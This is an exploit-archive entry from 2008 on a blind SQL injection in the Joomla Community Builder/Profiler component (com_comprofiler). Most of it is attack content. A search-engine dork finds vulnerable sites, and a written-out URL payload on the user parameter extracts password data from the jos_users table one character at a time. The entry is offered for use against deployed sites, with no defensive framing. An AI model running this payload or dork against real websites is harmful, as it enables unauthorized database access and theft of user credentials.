[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Joomla Community Builder <= 1.0.1 Blind SQL Injection Vulnerability
# Published : 2008-04-23
# Author : $hur!k'n
# Previous Title : YouTube Clone Script (spages.php) Remote Code Execution Exploit
# Next Title : Joomla Component FlippingBook 1.0.4 SQL Injection Vulnerability
#########################################################
# #
# Joomla Component Profiler Blind SQL Injection #
# #
#########################################################
########################################
[~] Vulnerability found by: $hur!k'n
[~] Contact: alibabanala@hotmail.com
########################################
[~] ScriptName: "Joomla"
[~] ModuleName: "Profiler"
[~] Version: ?
########################################
[~] DORK: allinurl:com_comprofiler
########################################
[~] Exploit: /index.php?option=com_comprofiler&task=userProfile&user=[SQL]
[~] Example: /index.php?option=com_comprofiler&task=userProfile&user=1/**/and/**/mid((select/**/password/**/from/**/jos_users/**/limit/**/0,1),1,1)/**/</**/Char(97)/*
########################################
# www.Syue.com [2008-04-23]